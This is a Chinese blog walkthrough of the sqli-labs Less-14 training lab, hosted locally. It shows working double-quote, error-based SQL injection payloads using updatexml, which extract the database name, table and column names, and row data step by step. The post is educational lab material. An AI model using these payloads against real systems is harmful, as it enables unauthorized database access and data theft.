目 录CONTENT

文章目录

sqli-labs系列——Less-14

CZ
CZ
2023-06-13 / 0 评论 / 0 点赞 / 313 阅读 / 2443 字 / 正在检测是否收录...
温馨提示:
本文最后更新于 2024-04-24,若内容或图片失效,请留言反馈。部分素材来自网络,若不小心影响到您的利益,请联系我们删除。

摘要

本次实验是针对Less-14注入漏洞的实验过程和优化注入语句的方法。我们首先通过构造payload判断是否存在注入漏洞,然后利用updatexml函数获取数据库的名称、表名、列名以及相应的数据。需要注意的是,本题是双引号的报错注入,因此在构造注入语句时需要注意引号的使用。注入漏洞的存在会给系统带来严重的安全威胁,因此需要加强对系统的安全性管理,避免注入漏洞的发生。

前言

这题跟Less-13的区别就是他是双引号的报错注入

前期准备

开启phpstudy,开启apache服务以及mysql服务

图片-1686619451321

实验环节

浏览器访问Less-14

http://127.0.0.1/sqli-labs-master/Less-14/

图片-1686620910864

判断是否存在注入

?id=1" and 1=1 -- xz
#页面报错说明存在注入

图片-1686534266310

判断库名

"and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- xz
#可得出我们的库名是security

图片-1686620143817

判断表名

"and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)-- xz
#说明我们的表名是emails

图片-1686620165900

判断列名

"and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- xz
#说明我们的列名是id

图片-1686620231871

"and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- xz
#说明我们emails下的id列的数据是1

图片-1686620279698

0

评论区